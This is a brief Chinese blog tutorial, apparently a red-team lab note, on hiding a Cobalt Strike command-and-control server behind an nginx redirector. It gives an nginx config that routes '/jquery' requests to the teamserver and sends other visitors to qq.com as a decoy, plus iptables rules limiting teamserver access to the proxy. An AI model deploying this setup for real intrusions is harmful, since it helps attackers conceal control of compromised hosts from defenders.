boxmoe_header_banner_img

⋅無⋅限⋅進⋅步⋅

加载中

POST
文章导读
测试工具

cobaltstrike与nginx隐藏c2

avatar
yuhui 2025年10月24日 31
0 评论

cobalt strike 与nginx隐藏c2

环境

teamserver 192.168.0.195
nginx 192.168.0.102
靶机 192.168.0.188

nginx配置

server {
listen 80;
server_name localhost;
#charset koi8-r;
#access_log logs/host.access.log main;
location ~*/jquery{
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass http://192.168.0.195:8089;
}
location /{
proxy_pass http://www.qq.com;
}

监听器生成

1746757284803-f8d09f48-6fb5-4018-9258-f665ec151fb5.png

iptables 设置只允许某个ip访问

sudo iptables -I INPUT -p tcp --dport 8089 -j DROP
sudo iptables -I INPUT -s 192.168.0.102 -p tcp --dport 8089 -j ACCEPT
sudo iptables-save

更新: 2025-05-09 10:21:53
原文: https://www.yuque.com/yuhui.net/network/cg3gr8ytb38s1uob

Post Views: 32

评论(0)

查看评论列表

暂无评论

发表评论

表情 颜文字

插入代码